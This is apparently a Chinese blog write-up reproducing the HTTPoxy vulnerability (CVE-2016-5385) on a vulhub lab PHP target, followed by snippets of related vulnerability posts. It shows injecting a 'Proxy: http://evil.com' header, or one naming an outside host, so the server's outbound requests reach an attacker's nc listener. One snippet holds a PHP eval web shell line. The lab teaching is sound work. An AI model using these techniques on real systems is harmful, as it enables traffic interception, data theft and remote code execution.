vulhub漏洞复现五_cgi

最新推荐文章于 2023-12-04 10:20:25 发布
最新推荐文章于 2023-12-04 10:20:25 发布
阅读量542 收藏
点赞数
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44193247/article/details/122341195
版权

CVE-2016-5385_HTTPoxy漏洞_PHP

靶场:192.168.4.10_ubuntu

前言

根据RFC 3875规定,CGI(fastcgi)要将用户传入的所有HTTP头都加上`HTTP_`前缀放入环境变量中,而恰好大多数类库约定俗成会提取环境变量中的`HTTP_PROXY`值作为HTTP代理地址。于是,恶意用户通过提交`Proxy: http://evil.com`这样的HTTP头,将使用缺陷类库的网站的代理设置为`http://evil.com`,进而窃取数据包中可能存在的敏感信息。

漏洞复现

本环境使用PHP 5.6.23为例。

1. 环境搭建

#docker-compose up -d

2. 漏洞利用

访问http://192.168.4.10:8080/index.php,可看到origin:显示为当前请求服务地址

添加附带头Proxy: http://*.*.*.114:30001 ,访问http://192.168.4.10:8080/index.php,,

综上,真正进行HTTP访问的服务器是`*.*.*.114`,也就是说正常的HTTP请求代理在`*.*.*.114`上,在`*.*.*.114`上使用NC,就可以捕获当前请求的数据包,其中可能包含敏感数据。

Revenge_scan
关注
Vulhub靶场CGI HTTPoxy漏洞复现(CVE-2016-5385)
X_python321的博客
07-26 287
免责声明:本文仅用于技术交流和知识分享目的。漏洞复现涉及到系统和网络的安全性测试,可能导致系统崩溃、数据丢失或其他问题。读者在尝试漏洞复现之前必须获得合法授权,并自行承担一切风险和责任。
利用Vulnhub复现漏洞 - DNS域传送漏洞
JiangBuLiu的博客
07-02 1268
DNS域传送漏洞Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现dig命令 Vulnhub官方复现教程 https://vulhub.org/#/environments/dns/dns-zone-transfer/ 漏洞原理 DNS协议支持使用axfr类型的记录进行区域传送,用来解决主从同步的问题。如果管理员在配置DNS服务器的时候没有限制允许获取记录的来源,将会导致DNS域传送漏洞。...
复现iis7/ii7.5的fastcgi解析漏洞
per_se_veran_ce的博客
08-28 1494
在windows server 2008 r2上搭建 php服务 1、下载php解释器 地址为http://windows.php.net/download/ 版本有两种,线程安全和非线程安全,线程安全是给apache用的,非线程安全是给iis用的,我们要配的是iis,所以下载非线程安全的,x86和x64看自己的机器是什么系统选择对应的版本下载就行了。 安装vcredist_x64.exe ...
[Vulhub](CVE-2012-1823)PHP-CGI远程代码执行漏洞
weixin_45605352的博客
03-28 1761
首先理解一下CGI的概念: CGICGI 全称是“公共网关接口”(Common Gateway Interface),HTTP 服务器与你的或其它机器上的程序进行“交谈”的一种工具,其程序须运行在网络服务器上。 CGI 可以用任何一种语言编写,只要这种语言具有标准输入、输出和环境变量。如 PHP, Perl, Tcl 等。 作用: CGI是一种根据请求信息动态产生回应内容的技术。 通过CGIWeb服务器可以根据请求不同启动不同的外部程序,并将请求内容转发给该程序,在程序执行结束后,将执行结果作为回应返
漏洞复现之信息漏洞
最新发布
zkaqlaoniao的博客
12-04 179
Tenda 路由器是深圳市吉祥腾达科技有限公司的一款智能无限路由器。Tenda 路由器存在信息泄露漏洞,攻击者通过构造特殊 URL 地址,读取系统敏感信息网访问该系统。4、从配置中查找账户密码(直接打开JPG就行了)
httpproxy+shiro
qq_61142406的博客
05-28 322
CVE-2016-5385 漏洞产生的原理: 有了以上的铺垫,可以大概猜想,如果cgi处理解析后的环境变量时,没有进行安全检查,可能会被黑阔恶意利用。而httpoxy,恰是本次漏洞的切入点。 在CGI(RFC 3875)的模式的时候, 会把http头部, 加上HTTP_ 前缀, 注册为环境变量。 如果在Header中发送一个Proxy:xxxxxx, 那么PHP就会把他注册为HTTP_PROXY环境变量,篡改着就可以在该代理服务器上监听这些请求。 影响版本: PHP5.6.24版本修复了该漏洞,不会
DNS域传送漏洞——vulhub漏洞复现 007
jammny
01-20 1323
前言: Vulhub是一个基于docker和docker-compose的漏洞环境集合,进入对应目录并执行一条语句即可启动一个全新的漏洞环境,让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身。 Voulhub靶机平台环境搭建和使用: https://blog.csdn.net/qq_41832837/article/details/103948358 目录: 漏洞原理 漏洞详情 漏洞复...
vulhub漏洞复现55_python
weixin_44193247的博客
02-11 749
vulhub漏洞复现练习篇
Nginx 解析漏洞复现及利用
Tauil的博客
07-20 7763
Nginx解析漏洞该解析漏洞是PHPCGI漏洞,在PHP的配置文件中有一个关键的选项cgi.fix_pathinfo默认开启,当URL中有不存在的文件,PHP就会向前递归解析在一个文件路径(/xx.jpg)后面加上/xx.php会将/xx.jpg解析为php文件。来上传我们的文件,很显然,不给上传,东西写进去文件被破坏了,被检验出不是正常的jpg不能上传了,可能有些朋友就成功了,因为第一次的时候我是可以的,现在应该是写的内容太多了,出了问题。phpeval($_POST["cmd"]);...
PHP-FPM Fastcgi 未授权访问漏洞复现
玄道的网安博客
03-05 977
简介 PHP-FPM是一个fastcgi协议解析器,Nginx等服务器中间件将用户请求按照fastcgi的规则打包好传给FPM。FPM按照fastcgi的协议将TCP流解析成真正的数据。PHP-FPM默认监听9000端口,如果这个端口暴露在公网,则我们可以自己构造fastcgi协议,和fpm进行通信。 环境搭建 这里使用docker进行搭建 https://github.com/vulhub/vulhub 进入目录并启动 cd vulhub-master/php/fpm/ ...
漏洞复现-zabbix系列
aming小老弟
01-09 5867
Zabbix SIA Zabbix是拉脱维亚Zabbix SIA公司的一套开源的监控系统。基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案。该系统支持网络监控、服务器监控、云监控和应用监控等。能监视各种网络参数,保证服务器系统的安全运营;并提供灵活的通知机制以让系统管理员快速定位/解决存在的各种问题。zabbix由2部分构成,zabbix server与可选组件zabbix agent。
vulhub靶场搭建及漏洞复现教程
热门推荐
Cwillchris的博客
03-25 2万+
准备一个纯净的ubantu系统 1、先更新一下安装列表 sudo apt-get update 2、安装docker.io sudo apt install docker.io 查看是否安装成功 docker -v 3、查看是否安装pip pip -V 检测到未安装,提示是否安装,按y下载 再次输入pip -V查看是否安装成功 4、安装docker-compose pip install docker-compose 查看是否安装成功 docker
vulhub漏洞复现1
xhscxj的博客
05-23 1953
CVE-2018-18778 CVE-2018-18778是基于mini_httpd的一个任意文件读取漏洞 Mini_httpd是一个微型的Http服务器,在占用系统资源较小的情况下可以保持一定程度的性能(约为Apache的90%),因此广泛被各类IOT(路由器,交换器,摄像头等)作为嵌入式服务器。而包括华为,zyxel,海康威视,树莓派等在内的厂商的旗下设备都曾采用Mini_httpd组件。 影响版本:ACME mini_httpd before 1.30 分析 当mini_httpd开启虚拟主机时,此
PHP-CGI远程代码执行漏洞(CVE-2012-1823)
orchid_sea的博客
07-19 2678
在启动docker容器时,提示ServerName错误。将配置文件从容器中复制出来修改,再复制回去。将ServerName位置添加所需IP。检查一下是否修改成功。
CGI漏洞利用
矿野上的脚印
07-18 1万+
CGI漏洞利用CGI漏洞是网管最容易乎视的地方,就我测试的这个网站上的漏洞, 我简单说一下,几个常见的漏洞地方。一般原理,解决方法,如果没有写全,请参考一些文献。 1,名字:?PageServices漏洞 这个漏洞是很多网站都有的。但是有好多人扫描出来确不知道如何运用,在此我简单谈一下吧,! 这个是可以显示页面清单的 方法是url/?PageServices 还可以这样试试 ! /?wp-cs-d
PHP-CGI远程代码执行漏洞CVE-2012-1823复现
从不专注的人的博客
06-17 1016
目录CVE-2012-1823漏洞原因影响版本漏洞利用cgi模式下的参数开启实验环境访问网站制造漏洞执行代码移除漏洞环境 CVE-2012-1823 漏洞原因 用户请求的querystring被作为了php-cgi的参数执行了,命令行参数不仅可以通过#!/usr/local/bin/php-cgi -d include_path=/path的方式传入php-cgi,还可以通过querystring的方式传入。 影响版本 < php-5.3.12 or php < 5.4.2 mod方式、fpm方
每天复现一个漏洞--vulhub
微赚淘客系统开发者博客
11-30 950
phpmyadmin scripts/setup.php 反序列化漏洞(WooYun-2016-199433) 漏洞原理:http://www.polaris-lab.com/index.php/archives/66/ 根据提示我们先进入到 /scripts/setup.php 的目录下 由于 configuration 参数是可控的 所以我们可以根据 poc...
利用Vulnhub复现漏洞 - HTTPoxy漏洞(CVE-2016-5385)
JiangBuLiu的博客
07-09 2335
HTTPoxy漏洞(CVE-2016-5385)Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现端口设置浏览器设置BurpSuit设置发出请求 Vulnhub官方复现教程 https://vulhub.org/#/environments/cgi/httpoxy/ 漏洞原理 参考:http://www.laruence.com/2016/07/19/3101.html 简单来说,根据RF...
vulnhub -- hacksudo: Thor
weixin_46107179的博客
05-06 349
靶机下载地址:下载链接 这里通过arp-scan -l来发现主机,主机IP地址:10.0.2.7 信息搜集 namp对IP地址进行端口扫描(开放21,22,82端口) 通过80端口访问,首页是一个登录页面,尝试用弱密码进行登录一下,发现不能登录成功 接着访问一下其他页面,发现concat下有一些基本信息(可以搜集尝试登录,但无果),其他页面也没有什么有用信息 接下来用dirsearch进行目录扫描,可以发现有一些文件可以访问 README.md以及还有一个后台登录页面 查看README.md文件,发
mod_cgi.so 下载
08-18
mod_cgi.so 是一个Apache Web服务器模块,用于处理动态网页脚本的请求。作为一个.so文件,它是Apache的一部分,并且必须与Apache一起下载和安装。 要下载 mod_cgi.so,首先需要找到适用于您系统的Apache版本的二进制发行版。通常,这可以在Apache官方网站上找到。下载适合您操作系统和Apache版本的发行版。 安装Apache发行版后,您将会找到 mod_cgi.so 在Apache的安装目录中的模块文件夹中。通常情况下,这个文件夹的路径类似于 /usr/lib/apache2/modules 或者 /etc/httpd/modules。 如果您下载的Apache发行版没有包含 mod_cgi.so,您还可以尝试从源代码编译 Apache。要做到这一点,您需要从Apache官方网站下载适合您系统的Apache源代码包。解压源代码包后,使用适当的编译选项来编译Apache,并确保启用CGI支持。完成编译和安装后,您将在模块文件夹中找到 mod_cgi.so。 请注意,在安装或配置 mod_cgi.so 之前,您可能需要安装其他依赖库或工具。这些依赖关系因操作系统而异,所以请根据您的操作系统和环境进行必要的研究和准备。 总之,要下载 mod_cgi.so,您需要下载适用于您系统的Apache发行版,并根据安装指南进行安装。确保启用CGI支持,并根据需要进行其他配置。下载完成后,将 mod_cgi.so 文件放置在正确的模块文件夹中即可使用。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值